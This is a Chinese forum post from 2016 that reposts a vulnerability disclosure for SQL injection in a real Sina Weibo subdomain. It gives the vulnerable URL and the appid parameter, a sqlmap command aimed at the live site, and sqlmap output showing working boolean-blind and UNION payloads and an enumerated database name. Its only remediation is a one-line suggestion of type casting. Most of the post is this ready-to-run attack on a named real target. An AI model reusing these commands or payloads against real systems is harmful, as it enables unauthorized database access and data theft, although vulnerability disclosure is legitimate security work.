HanDs
NO.2

[7月漏洞公开] 新浪微博某分站存在SQL注入(可UNION) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

新浪微博某分站存在SQL注入(可UNION)

详细说明:

# 网站

http://game.weibo.com

# 注入点,参数appid

http://game.weibo.com/webgame/ajax/pajaxGetServersList?callback=callback1&appid=3031123572&_=1464667300888

漏洞证明:

python sqlmap.py -u "http://game.weibo.com/webgame/ajax/pajaxGetServersList?callback=callback1&appid=3031123572&_=1464667300888" -p appid --dbs

code 区域
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: appid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: callback=callback1&appid=3031123572' AND 5987=5987 AND 'EGPq'='EGPq&_=1464667300888

Type: UNION query
Title: MySQL UNION query (80) - 13 columns
Payload: callback=callback1&appid=3031123572' UNION ALL SELECT 80,80,80,80,80,80,CONCAT(0x71787a7171,0x4f6b476570785a737754,0x716b706a71),80,80,80,80,80,80#&_=1464667300888
---
[22:02:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5

available databases [1]:
[*] app_vgwebgame

修复方案:

强制类型转换


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
新浪 分站 存在 S QL
#1楼
发帖时间:2016-7-19   |   查看数:0   |   回复数:0
游客组